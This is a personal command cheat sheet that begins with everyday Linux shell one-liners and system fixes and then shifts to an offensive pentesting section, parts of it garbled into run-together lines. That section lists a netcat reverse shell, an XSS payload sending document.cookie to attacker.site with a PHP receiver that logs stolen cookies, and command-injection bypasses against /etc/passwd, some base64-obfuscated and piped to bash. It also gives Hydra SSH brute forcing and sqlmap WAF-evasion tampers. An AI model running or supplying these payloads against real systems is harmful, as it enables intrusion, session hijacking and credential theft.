# Everyday shell one-liners. The scrape collapsed them onto a single line; restored here
# one command per line, tokens unchanged. filename / foldername / username etc. are placeholders.
wc -l filename.txt                      # line count
cat filename.txt
mkdir foldername
rm filename
rm -rf foldername                       # recursive delete, no confirmation
sudo rm filename
touch filename                          # create an empty file / bump its mtime
# NOTE(review): '>' below redirects into a file literally named "tee"; "filename" is just a
# printf argument that goes unused. Presumably meant: printf " " | tee filename
printf " " > tee filename
cat filename | grep -i "word"           # lines containing word, case-insensitive (grep -i "word" filename does the same without cat)
cat filename | grep -v "word"           # lines NOT containing word
cd foldername
cd                                      # back to $HOME
locate filename                         # queries the updatedb index, not the live filesystem
ls
ls -l
cd ~/directory_inside_your_home_folder
sudo service service_name status
sudo fstrim -a -v                       # discard unused blocks on every mounted filesystem that supports it, verbose
sudo apt autoremove && sudo apt clean
sudo cp filename ~/Pictures/foldername
sudo chown username:username filename 
sudo chown username:username *          # unquoted glob: every non-hidden entry in the current directory
sudo chmod +x scriptname.ext
./scriptname
htop
netstat -a | grep -E "tcp|udp" | grep -i "https"   # all sockets, TCP/UDP only, then lines mentioning https (service names, since -n is absent)
netstat -pn | grep -E "tcp|udp"         # -p shows owning PID/program (sockets of other users need root), -n skips name resolution
# NOTE(review): the doubled quote before { on the next line breaks the quoting, so awk never
# receives a program; presumably a typo for awk '{print $1"\t"$4}' -- the report one-liner
# further down uses that form correctly.
ps | awk ''{print $1"\t"$4}'
ps -aux | awk '{print $1"\t"$2"\t"$NF}'  # user, PID, last field (command)
awk -F ":" '{print " | "$1" | "$6" | "$7" | "}' /etc/passwd   # /etc/passwd fields 1, 6, 7: login name, home directory, login shell
# NOTE(review): uniq before sort only drops adjacent duplicates; sort -u would deduplicate fully.
awk -F "/" '/^\// {print $NF}' /etc/shells | uniq | sort      # basename of each absolute path in /etc/shells
# History without the leading event numbers. sub(" ", " ") replaces a space with a space, so the
# blank left by clearing $1 stays; sub(/^ /, "") was probably intended. Shell history routinely
# holds secrets typed on the command line -- treat the output as sensitive.
history | awk '{$1=""; sub(" ", " "); print}'
# Strips the ": <timestamp>:<duration>;" prefix -- presumably zsh EXTENDED_HISTORY format; confirm.
cat ~/.zsh_history | awk -F ":" '{$1="";$2=""; sub(" ", " "); print}' | awk -F ";" '{$1=""; sub(" ", " "); print}'
awk -F "/" '/^\// {print $NF}' /etc/shells | uniq | sort      # same command as above (repeated in the original)
# Local host summary in one chain. `print` is zsh's builtin; under bash substitute printf.
# "Ports Scan" is a listing of this host's own sockets, not a scan of remote hosts.
print "\n=== Routing Tables ===\n" && netstat -r &&
  print "\n\n=== Ports Scan ===\n" && netstat -pn | grep -E "tcp|udp" &&
  print "\n\n=== Active Connections ===\n" && netstat -a | grep -E "tcp|udp" | grep -i "https" &&
  print "\n\n=== Active Front Processes ===\n" && ps | awk '{print $1"\t"$4}' &&
  print "\n\n=== Active All Processes ===\n" && ps -aux | awk '{print $1"\t"$2"\t"$NF}' &&
  print "\n\n=== App Users ===\n" && awk -F ":" '{print " | "$1" | "$6" | "$7" | "}' /etc/passwd &&
  print "\n\n=== Installed Shells ===\n" && awk -F "/" '/^\// {print $NF}' /etc/shells | uniq | sort
nc -v website.com 80                    # plain TCP connect test; for TLS use openssl s_client -connect host:443 instead
# Use openssl for https traffic
[\s\S].(WORD).*[\s\S]
^(.*?WORD) ?
| Name | Symbol | Pure Regex |
|---|---|---|
| Caret | ^ | ^ |
| Digit | \d | [0-9] |
| Not Digit | \D | [^0-9] |
| Word | \w | [A-Za-z0-9_] |
| Not Word | \W | [^A-Za-z0-9_] |
| Whitespace | \s | [ \t\n\r\f\v] |
| Not Whitespace | \S | [^ \t\n\r\f\v] |
sudo apt-get -o Acquire::Check-Valid-Until=false -o Acquire::Check-Date=false update
(These two options turn off apt's Release-file expiry and date checks, so an outdated or replayed repository snapshot is accepted without complaint; use them only as a temporary workaround, not as a permanent setting.)
- Add the following line
i915.enable_psr=0
Inside:
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
After `splash`.
2. Install Compton compositor
sudo apt -y install compton
For XFCE:
xfconf-query -c xfwm4 -p /general/use_compositing -s false
rm -rf ~/.config/xfce4/ && sudo reboot
- Go to the compositor options of your 'display settings' and select 'no compositor' or any other option (only if you don't want any compositor).
- ONLY use if driver issues persist - disable nouveau modeset
nouveau.modeset=0
Inside the line after splash
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
sudo systemctl restart NetworkManager.service
- Try to restart the dnsmasq service:
sudo service dnsmasq restart
- Create the resolver file and add Google DNS to it:
sudo touch /etc/resolv.conf
and add
nameserver 8.8.8.8
inside it. (Where systemd-resolved manages /etc/resolv.conf the file is normally a symlink, and a manual edit may be overwritten on the next restart.)
- Restart the resolver service:
sudo systemctl restart systemd-resolved.service && sudo service systemd-resolved status
- Restart resolv service:
# Port / process troubleshooting plus a few connection helpers (restored one command per line).
sudo netstat -ltnp | grep -w ':8080'    # listening TCP sockets with owning PID, filtered to port 8080
lsof -i :8080                           # same question via lsof (any state, not only LISTEN)
ps -fA | grep python                    # full-format listing; the grep process itself matches too
kill 81211                              # SIGTERM to one PID (example value); the process gets to clean up
# NOTE(review): the next line SIGKILLs every process whose name contains "python" (possibly the
# grep itself as well) and gives none of them a chance to clean up; pkill is the usual idiom for
# "kill by name". The line is repeated verbatim in the original.
kill -9 $(ps -A | grep python | awk '{print $1}')
kill -9 $(ps -A | grep python | awk '{print $1}')
cat old_file | grep -i "word_to_filter" | anew new_file   # anew is third-party: appends only lines not already in new_file (presumably tomnomnom/anew -- confirm)
proxychains firefox -p profile_name     # open the named profile with TCP traffic forced through the proxies in proxychains.conf
proxychains script_name
git clone --depth=1 https://github.com/username/reponame.git   # shallow clone, latest commit only
subl filename                           # Sublime Text
sudo openvpn the_ovpn_file.ovpn         # bring up the VPN described by the .ovpn profile
ssh username@servername
ip route add 192.168.220.0/24 via 10.10.24.1   # static route; needs root / CAP_NET_ADMIN (note: no sudo here, unlike the lines above)
rdesktop 192.168.200.10                 # RDP client
# Start in new terminal!
sudo python -m SimpleHTTPServer 80assetfinder domain.com | anew filenamecat subdomain_list_file | httprobe | anew probed_urlsgau domain.com | anew all_urlscurl -X POST https://website.com/assets/somefolder/cli.PNG -d "_=command"python BMPinjector.py -i image.bmp "<scRiPt y='><'>/*<sCRipt* */prompt()</script"python3 ~/ParamSpider/paramspider.py --domain https://www.website.com/ -o ~/WorkingDirectory/website_directory/pspider--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywordspython3 ~/XSStrike/xsstrike.py -u https://website.com/param=FUZZ --fuzzersudo pandora bombgodork -q "inurl:search.php=" -p 50 | tee results.txtproxychains godork -q "inurl:search.php=" -p 50 | tee results.txtgobuster dir -url https://website.com/ | anew dirs && dirb https://website.com | anew dirsmkdir tmpwork && cd tmpwork && wget [https://github.com/TryCatchHCF/PacketWhisper/archive/master.zip](https://github.com/TryCatchHCF/PacketWhisper/archive/master.zip)- Start python simple http server
- Goto victims machine & open outbound port
- Generate powershell cmd & start wireshark on attacker machine
- On victim machine, execute generated powershell code
fping -a -g 10.0.2.15/24 2> /dev/null
nmap -sn 10.0.2.15/24sudo nmap -sV -F -sS ip_addrAttacker machine:
nc -lvp 1337 -e /bin/bashVictim machine:
nc -v attackerip 1337On victim asset:
<script> var i = new Image(); i.src="https://attacker.site/get.php?cookie="+escape(document.cookie) </script>On attacker website:
<?php
// Receiving end of the <img> beacon on the line above: each request appends the client's
// address, its User-Agent and the URL-decoded query string (which carries the cookie=
// parameter) to jar.txt, a relative path resolved against the working directory.
// NOTE(review): a cookie flagged HttpOnly is never exposed through document.cookie, so it
// cannot arrive here; a CSP that restricts img-src blocks the beacon request itself.
$ip = $_SERVER['REMOTE_ADDR'];           // peer address as the web server sees it
$browser = $_SERVER['HTTP_USER_AGENT'];  // raw request header, unvalidated
$fp = fopen('jar.txt', 'a');             // append mode; the return value is not checked, so a failed open is not detected here
fwrite($fp, $ip.' '.$browser."\n");
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n\n");   // whole query string, decoded once, written verbatim -- anything reading jar.txt must treat it as untrusted input
fclose($fp);hydra server_ip_addr ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Password/rockyou-10.txt -f -Vairodump-ng --channel 1 wlan0 / airodump-ng --channel 1 --encrypt WPA1 wlan0airodump-ng --band abg wlan0airodump-ng --channel 1,2,3,4 / --essid AP_NAMEairodump-ng --band abg wlan0 / --essid AP_NAME / --bssid MAC_ADDRESS_OF_ORIGINAL_DEVICE- Using command seperate:
; pwd - Using command append:
&& cat /etc/passwd - Using pipe:
| cat /etc/passwd - Using quoted command - add quotes for any character in word (EX:
cat/et"c"/p"a"ssw"d") - Using wildcards - replace any word with "
*" & "?" (EX:cat /etc/pa*wdorcat /etc/p?sswd) - Using null vars - add
``in between words (EX:cat /e``tc/p``asswd) - Multi bypass - (EX:
|cat /"e"t``c/p?sswd) - Lethal injection 1 - reversed + multi filters (EX:
echo "dws?ap/c``t"e"/ tac" | rev | /bin/bash) - Lethal injection 2 - reversed + endeded + multi filters (EX:
echo "ZHdzP2FwL2NgYHQiZSIvIHRhYw==" | base64 -d | rev | /bin/bash)
Fuzzing for bypass: https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/command-injection.md
"dws?ap/c``t"e"/ tac" | rev
- Test reflection On victim asset:
127.0.0.1 | nc ip_addr_attacker port_numberOn attacker machine:
nc -lvp port_number- If reflection success, get reverse shell On victim asset:
127.0.0.1 | nc ip_addr_attacker port_number -e /bin/bashOn attacker machine:
python -c "import pty:pty.spawn('/bin/bash')"